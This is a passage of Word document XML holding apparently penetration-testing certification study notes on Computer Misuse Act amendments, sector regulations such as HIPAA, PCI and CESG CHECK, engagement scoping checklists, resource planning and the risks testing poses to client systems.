        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This act has amendments to the Computer misuse act such that the act now:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001223F3" w:rsidRPr="00D1486B" w:rsidRDefault="00FA6566" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Now includes the intent of making a system insecure to allow unauthorised access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA6566" w:rsidRPr="00D1486B" w:rsidRDefault="00FA6566" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Higher punishment can be applied for breaches of the at (12 months imprisonment E&amp;W). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007603E8" w:rsidRPr="00D1486B" w:rsidRDefault="007603E8" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Section 3 - “modification of computer material” is broadened to cover impairment of computer system, its data, and system/data integrity. The amendment also includes recklessness acts and well as intent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B22D0" w:rsidRPr="00D1486B" w:rsidRDefault="005B22D0" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Also include making</w:t>
      </w:r>
      <w:r w:rsidR="007603E8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, supplying, or obtaining articles for use in computer misuse</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. So this mainly includes viruses/worms but could equally apply to tools used explicitly for crime.</w:t>
      </w:r>
      <w:r w:rsidR="007603E8" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B22D0" w:rsidRPr="005F25BF" w:rsidRDefault="005B22D0" w:rsidP="005B22D0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A2b - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Impact of this legislation on penetration testing activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E17D9" w:rsidRPr="00D1486B" w:rsidRDefault="002E17D9" w:rsidP="002E17D9">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Covered in A1a (above).</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="005F25BF" w:rsidRDefault="005F25BF" w:rsidP="001223F3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E17D9" w:rsidRDefault="008F2F3E" w:rsidP="002E17D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A2c - </w:t>
      </w:r>
      <w:r w:rsidR="002E17D9" w:rsidRPr="005F25BF">
        <w:t>Awareness of se</w:t>
      </w:r>
      <w:r>
        <w:t>ctor-specific regulatory issues</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B477F8" w:rsidRDefault="00B477F8" w:rsidP="001223F3"/>
    <w:p w:rsidR="00B477F8" w:rsidRPr="00D1486B" w:rsidRDefault="002E17D9" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sarbanes and Oxley (SOX) - SOX is that it is primarily focused on the accuracy of financial reporting data. IT security is important under SOX to the extent that it enhances the reliability and integrity of that reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E17D9" w:rsidRPr="00D1486B" w:rsidRDefault="002E17D9" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Health Insurance Portability and Accountability Act (HIPAA) </w:t>
      </w:r>
      <w:r w:rsidR="00D912AA" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>–the security rules within HIPAA applies to electronic protected health information (EPHI), which is individually identifiable health information (IIHI) in electronic form. Specifically organisations under the rule must maintain reasonable and appropriate administrative, physical, and technical safeguards to protect the confidentiality, integrity, and availability of their EPHI against any reasonably anticipated risks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D912AA" w:rsidRPr="00D1486B" w:rsidRDefault="00D912AA" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Payment Card Industry (PCI) - The PCI Data Security Standard is a security standard that includes requirements for security management, policies and procedures when dealing with payment cards details (debit, credit, prepaid, e-purse, ATM, and POS cards and associated businesses).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D912AA" w:rsidRPr="00D1486B" w:rsidRDefault="00D912AA" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CESG CHECK – the scheme provides a standard that is a mandatory pre-requisite for Central Government testing. Subscriber organizations to the scheme are required to maintain strict ethical standards, and certified individuals are automatically vetted to at least SC level security clearance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D912AA" w:rsidRPr="00D1486B" w:rsidRDefault="00D912AA" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Joint Services Protocol 440 (JSP 440) – British Ministry of Defense restricted document for security containing instructions for avoiding leaks in the information flow due to hackers, journalists, and foreign spies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRPr="00D1486B" w:rsidRDefault="00D912AA" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Client Specific Non-disclosure Agreement</w:t>
      </w:r>
      <w:r w:rsidR="005F1546" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Client may ask you to sign a non-disclosure agreement to protect their intellectual rights and to ensure no embarrassment through disclosure of vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRPr="00D1486B" w:rsidRDefault="005F1546" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ISO27001 Information Security Management System (ISMS) standard – Specifies requirements for Information technology, security techniques, and information security management systems. It is intended to bring information security under explicit management control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001223F3" w:rsidRDefault="001223F3" w:rsidP="001223F3"/>
    <w:p w:rsidR="005F1546" w:rsidRDefault="005F1546" w:rsidP="005F1546">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>A3 - Scoping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRDefault="005F1546" w:rsidP="005F1546">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A3a - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Un</w:t>
      </w:r>
      <w:r>
        <w:t>derstanding client requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC152F" w:rsidRPr="00D1486B" w:rsidRDefault="005F1546" w:rsidP="005F1546">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Find out what testing is required: </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Application</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Web application</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Infrastructure</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On-host analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC152F" w:rsidRPr="00D1486B" w:rsidRDefault="00AC152F"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W</w:t>
      </w:r>
      <w:r w:rsidR="005F1546" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ireless</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRPr="00D1486B" w:rsidRDefault="00AC152F"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etc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRPr="00D1486B" w:rsidRDefault="005F1546" w:rsidP="005F1546">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Knowledge level required for testing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRPr="00D1486B" w:rsidRDefault="005F1546" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Zero-knowledge (black box for application) testing: - from an attacker’s point of view. The disadvantage with this is time required for enumeration of potential targets and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRPr="00D1486B" w:rsidRDefault="005F1546" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Full-knowledge (grey/white box for application) testing: - from a full coverage point of view. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRPr="00D1486B" w:rsidRDefault="00AC152F" w:rsidP="005F1546">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F1546" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Check list of things to cover/request:</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 xml:space="preserve">List of targets: IPs/IP Ranges/hostnames </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 xml:space="preserve">Network diagram: </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Speed up network enumeration stage.</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Helps confirms scope.</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Helps understand system.</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Technology in use: OS/manufacture for infrastructure &amp; server technology for application (i.e. IIS, apache, oracle, MS-SQL, J2EE, ASP, ASPX, C++, Java, C#,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Protection devices (IDS, firewalls, proxies that may affect testing).</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Onsite rules/policies (virus scanning requirements, ID requirements for access to site).</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Technical contact details (problems, help, target verification,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Involvement of third parties (hosting organisations, trusted partners,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lastRenderedPageBreak/>
        <w:t>Backups &amp; customer care (inform customer should working backups, more frequent backups, increase/excessive logs for applications and protection devices/IDSs, possibly monitor/delete logs more frequently or increase disk space or disable auto shutdown (i.e. CrashOnAuditFail regkey) for full logs, request contact for IDS admin/analyst).</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System state (is it live or a test system, will customers be using system and are they aware i.e. possible performance hits on live system, if live is there a preferred testing time period [i.e. quite period, not during backups], if test does it fully represent the final system.)</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Critical systems and out of scope entities (critical systems may require more care on full time contact with technical person responsible).</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Provide source IP’s for external work, request them for internal testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRDefault="005F1546" w:rsidP="00AC152F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A3b - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Scoping projec</w:t>
      </w:r>
      <w:r w:rsidR="00AC152F">
        <w:t>t to fulfil client requirements</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Adequate discussion with the client to ensure they are getting exactly what they require. This involves fully understanding the system under assessment, its intended business purpose, and associated security risks. </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Accurate proposals detailing the scope, indented assessment procedures, and overall outcome of the assessment. </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Agreement with client that the proposed work fulfils their requirements.</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Risk assessments and threat models are aimed to assist in this process and should be utilised. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1546" w:rsidRDefault="005F1546" w:rsidP="00932D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A3c - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t xml:space="preserve">Accurate timescale </w:t>
      </w:r>
      <w:r w:rsidR="00AC152F">
        <w:t>scoping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC152F" w:rsidRPr="00D1486B" w:rsidRDefault="00AC152F" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ensure sufficient time to cover the full scope of the assessment without compromising the overall goals.</w:t>
      </w:r>
      <w:r w:rsidR="00932D8E" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not underestimate the time required to complete all tasks in full – build in contingency time to accommodate unforeseen problems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC152F" w:rsidRPr="00D1486B" w:rsidRDefault="00AC152F" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Needs to fit in with client requirements without impacting the fulfilment of the scope. (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Out of hours, number of consultants, etc)</w:t>
      </w:r>
      <w:r w:rsidR="00932D8E" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRDefault="005F1546" w:rsidP="00932D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A3d - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Resource planning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRPr="00932D8E" w:rsidRDefault="00932D8E" w:rsidP="00932D8E"/>
    <w:p w:rsidR="00932D8E" w:rsidRPr="00D1486B" w:rsidRDefault="00932D8E" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Appropriate people/skill set for the assessment to fulfil all requirements (e.g. expertise, accreditations, </w:t>
      </w:r>
      <w:r w:rsidR="00CD6B06" w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security clearance).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRPr="00D1486B" w:rsidRDefault="00932D8E" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="714" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fulfil client time requirements (OOH, number of consultants, other project dependencies such as system availability).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRDefault="00932D8E" w:rsidP="00932D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A4 - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Understanding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Explaining and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Managing Risk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRDefault="00932D8E" w:rsidP="00932D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A4a - </w:t>
      </w:r>
      <w:r w:rsidRPr="005F25BF">
        <w:t>Knowledge of additional risks that penetration testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can present</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRPr="00D1486B" w:rsidRDefault="00932D8E" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System unavailability/downtime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRPr="00D1486B" w:rsidRDefault="00932D8E" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Loss of confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRDefault="00932D8E" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1486B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System crashes or data corruption</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRPr="003C378D" w:rsidRDefault="003C378D" w:rsidP="00932D8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Increases audit/IDS logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932D8E" w:rsidRDefault="00CF44F7" w:rsidP="00CF44F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A4b - </w:t>
      </w:r>
      <w:r w:rsidR="00932D8E" w:rsidRPr="005F25BF">
        <w:t>Levels of risk relating to penetration testing, the usual</w:t>
      </w:r>
      <w:r w:rsidR="00932D8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00932D8E" w:rsidRPr="005F25BF">
        <w:t>outcomes of such risks materialising and how to mitigate</w:t>
      </w:r>
      <w:r w:rsidR="00932D8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F2F3E">
        <w:t>the risks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF44F7" w:rsidRDefault="00CF44F7" w:rsidP="00CF44F7"/>
    <w:p w:rsidR="003514F1" w:rsidRPr="003514F1" w:rsidRDefault="003514F1" w:rsidP="003514F1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003514F1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
